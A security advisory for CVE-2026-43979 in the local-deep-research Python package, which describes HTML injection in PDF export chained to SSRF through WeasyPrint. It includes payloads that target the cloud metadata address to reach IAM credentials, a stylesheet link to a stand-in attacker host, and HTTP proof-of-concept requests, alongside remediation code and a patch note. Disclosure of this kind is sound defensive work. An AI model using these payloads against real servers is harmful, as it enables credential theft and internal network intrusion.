GHSA-fj2m-qvh9-jq4q

Suggest an improvement
Source
https://github.com/advisories/GHSA-fj2m-qvh9-jq4q
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-fj2m-qvh9-jq4q/GHSA-fj2m-qvh9-jq4q.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-fj2m-qvh9-jq4q
Aliases
  • CVE-2026-43979
Published
2026-05-11T19:40:07Z
Modified
2026-05-11T19:50:51.473267Z
Severity
  • 5.0 (Medium) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N CVSS Calculator
Summary
local-deep-research is Vulnerable to HTML Injection via Unescaped User Input in PDF Export (`pdf_service.py:_markdown_to_html`)
Details

Summary

PDFService._markdown_to_html() constructs an HTML document by interpolating user-controlled values — specifically title (sourced from research.title or research.query) and metadata key-value pairs — directly into an f-string without any HTML escaping. An authenticated attacker can craft a research query containing HTML special characters to inject arbitrary HTML tags into the document processed by WeasyPrint during PDF export. This injection can be chained to trigger a Server-Side Request Forgery (SSRF), bypassing the application's existing SSRF defenses in ssrf_validator.py.


Details

Vulnerable code: src/local_deep_research/web/services/pdf_service.py, lines 171–176

# pdf_service.py:171-176
if title:
    html_parts.append(f"<title>{title}</title>")   # ← title is not escaped

if metadata:
    for key, value in metadata.items():
        html_parts.append(f'<meta name="{key}" content="{value}">')  # ← key/value are not escaped

Data flow trace:

User input: research.query
        │
        ▼
research_routes.py:1321
  pdf_title = research.title or research.query
        │
        ▼
research_routes.py:1325-1326
  export_report_to_memory(report_content, format, title=pdf_title)
        │
        ▼
pdf_service.py:107
  PDFService.markdown_to_pdf(markdown_content, title=pdf_title)
        │
        ▼
pdf_service.py:137
  _markdown_to_html(markdown_content, title, metadata)
        │
        ▼
pdf_service.py:172
  f"<title>{title}</title>"   ← injection point, no escaping
        │
        ▼
pdf_service.py:112
  HTML(string=html_content)   ← WeasyPrint renders the injected HTML

research.query is a string submitted by the user via POST /api/start_research, stored as-is in the database, and retrieved without any sanitization. When the user triggers POST /api/v1/research/<research_id>/export/pdf, this value is embedded unescaped into the HTML document processed by WeasyPrint.

Injection point 1: <title> tag breakout

Input:    </title><img src="http://169.254.169.254/latest/meta-data/" />
Rendered: <title></title><img src="http://169.254.169.254/latest/meta-data/" /></title>

When WeasyPrint encounters the injected <img> tag, it issues an HTTP GET request to the value of src by default.

Injection point 2: <meta> attribute breakout

Input:    " /><link rel="stylesheet" href="http://attacker.com/evil.css
Rendered: <meta name="..." content="" /><link rel="stylesheet" href="http://attacker.com/evil.css">

WeasyPrint will fetch and apply the external stylesheet, which also constitutes SSRF.


Proof of Concept

Step 1: Log in and submit a research query containing the injection payload

POST /api/start_research HTTP/1.1
Host: localhost:5000
Content-Type: application/json
Cookie: session=<valid_session>

{
  "query": "</title><img src=\"http://169.254.169.254/latest/meta-data/iam/security-credentials/\" onerror=\"x\"/>",
  "mode": "quick",
  "model_provider": "OLLAMA",
  "model": "llama3"
}

The response returns a research_id, e.g. "aaaa-bbbb-cccc-dddd".

Step 2: After the research completes, trigger PDF export

POST /api/v1/research/aaaa-bbbb-cccc-dddd/export/pdf HTTP/1.1
Host: localhost:5000
Cookie: session=<valid_session>
X-CSRFToken: <csrf_token>

Step 3: Intermediate HTML constructed server-side

<!DOCTYPE html><html><head>
<meta charset="utf-8">
<title></title><img src="http://169.254.169.254/latest/meta-data/iam/security-credentials/" onerror="x"/></title>
</head><body>
...report content...
</body></html>

Step 4: WeasyPrint issues an outbound HTTP request to the injected URL

Observed in network monitoring (e.g. tcpdump) or the target internal service logs:

GET /latest/meta-data/iam/security-credentials/ HTTP/1.1
Host: 169.254.169.254
User-Agent: WeasyPrint/...

Lightweight verification (no SSRF environment required):

Set the query to:

</title><title>INJECTED

The resulting HTML will contain two <title> tags and the PDF document metadata title will read INJECTED, confirming successful injection.


Impact

1. Chained SSRF (High Severity)

By injecting <img src>, <link href>, or <style>@import url() tags pointing to internal addresses, WeasyPrint will issue HTTP requests on behalf of the server during PDF generation. This allows access to:

  • Cloud metadata services (169.254.169.254) on AWS, GCP, or Azure — enabling theft of IAM credentials and instance identity documents.
  • Internal network services (192.168.x.x, 10.x.x.x) — enabling reconnaissance and interaction with internal APIs not exposed to the internet.
  • Localhost administrative interfaces — if SSRF protections are only applied at the user-input validation layer.

This is an effective bypass of the application's existing SSRF defenses in ssrf_validator.py, because WeasyPrint's outbound resource requests are never routed through that validator.

2. HTML Document Structure Corruption

Injected tags can prematurely close <head> and insert arbitrary content into <body>, causing WeasyPrint to render incorrectly or crash, resulting in a Denial of Service (DoS) condition for the export functionality.

3. CSS Injection (Medium Severity)

By injecting <link> or <style> tags that load external stylesheets, an attacker can fully control the visual content of the generated PDF, enabling report content forgery or spoofing.

4. Affected Scope

  • All PDF export operations are affected.
  • The vulnerability is reachable by any authenticated user — no elevated privileges required.

    - Because each user operates against their own encrypted database, cross-user exploitation is not possible. However, on any shared or multi-tenant deployment, every authenticated user can independently trigger this vulnerability.

Remediation

Apply html.escape() to all user-controlled values before embedding them in the HTML template inside _markdown_to_html:

import html

if title:
    html_parts.append(f"<title>{html.escape(title)}</title>")

if metadata:
    for key, value in metadata.items():
        html_parts.append(
            f'<meta name="{html.escape(str(key))}" content="{html.escape(str(value))}">'
        )

Additionally, consider configuring WeasyPrint with a custom url_fetcher that blocks or restricts outbound HTTP requests to prevent SSRF via injected or legitimately-embedded external resources:

def safe_url_fetcher(url, timeout=10):
    from ssrf_validator import validate_url
    if not validate_url(url):
        raise ValueError(f"Blocked unsafe URL in PDF rendering: {url}")
    return weasyprint.default_url_fetcher(url, timeout=timeout)

html_doc = HTML(string=html_content, url_fetcher=safe_url_fetcher)

Report generated against commit f3540fb3 — local-deep-research, branch main.


Maintainer note (2026-04-24)

Thanks @Firebasky for the detailed report. The complete remediation spans two PRs, both merged to main:

#3082 (merged 2026-03-29, shipped in v1.5.0+) — closes the HTML-injection sinks: - html.escape() now wraps the title value in <title>…</title> - Same for metadata keys/values in <meta name="…" content="…"> - Regression tests added in tests/web/services/test_pdf_service.py

#3613 (merged 2026-04-24, shipped in v1.6.0) — implements the url_fetcher recommendation from the Remediation section: - New _safe_url_fetcher in pdf_service.py delegates to weasyprint.default_url_fetcher only after security.ssrf_validator.validate_url accepts the URL - Blocks AWS metadata (169.254.169.254), RFC1918, loopback, and non-http(s) schemes - Covers the chained SSRF path through any URL reaching the rendered HTML — markdown body, citations, raw-HTML passthrough via Python-Markdown - Blocked URLs raise UnsafePDFResourceURLError (a ValueError subclass) so WeasyPrint skips the resource and the render continues - 8 regression tests, including an end-to-end render with <img src="http://169.254.169.254/…"> embedded in the body

Advisory metadata: CVSS CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N (5.0 Moderate), CWEs CWE-79 + CWE-918. Patched in v1.6.0 — upgrade to v1.6.0 or later to receive both fixes.

Database specific
{
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-11T19:40:07Z",
    "cwe_ids": [
        "CWE-79",
        "CWE-918"
    ],
    "severity": "MODERATE",
    "nvd_published_at": null
}
References

Affected packages

PyPI / local-deep-research

Package

Name
local-deep-research
View open source insights on deps.dev
Purl
pkg:pypi/local-deep-research

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
1.6.0

Affected versions

0.*
0.1.0
0.1.1
0.1.12
0.1.13
0.1.14
0.1.15
0.1.16
0.1.17
0.1.18
0.1.19
0.1.20
0.1.21
0.1.22
0.1.23
0.1.24
0.1.25
0.1.26
0.2.0
0.2.2
0.2.3
0.3.0
0.3.1
0.3.2
0.3.3
0.3.5
0.3.6
0.3.8
0.3.9
0.3.10
0.3.11
0.3.12
0.4.0
0.4.1
0.4.2
0.4.3
0.4.4
0.5.0
0.5.2
0.5.3
0.5.4
0.5.5
0.5.6
0.5.7
0.5.9
0.6.0
0.6.1
0.6.4
0.6.5
0.6.7
1.*
1.0.0
1.0.1
1.1.1
1.1.6
1.1.7
1.1.8
1.1.9
1.1.10
1.1.11
1.2.0
1.2.1
1.2.2
1.2.3
1.2.4
1.2.5
1.2.6
1.2.7
1.2.8
1.2.9
1.2.10
1.2.11
1.2.12
1.2.13
1.2.14
1.2.15
1.2.16
1.2.17
1.2.24
1.2.25
1.2.26
1.2.27
1.2.28
1.3.0
1.3.1
1.3.6
1.3.7
1.3.8
1.3.9
1.3.10
1.3.11
1.3.12
1.3.13
1.3.14
1.3.15
1.3.16
1.3.17
1.3.18
1.3.19
1.3.20
1.3.21
1.3.22
1.3.24
1.3.25
1.3.26
1.3.28
1.3.29
1.3.30
1.3.40
1.3.41
1.3.42
1.3.43
1.3.44
1.3.45
1.3.46
1.3.47
1.3.48
1.3.49
1.3.50
1.3.51
1.3.52
1.3.53
1.3.54
1.3.55
1.3.56
1.3.57
1.3.58
1.3.59
1.3.60
1.4.0
1.5.0
1.5.3
1.5.5
1.5.6

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-fj2m-qvh9-jq4q/GHSA-fj2m-qvh9-jq4q.json"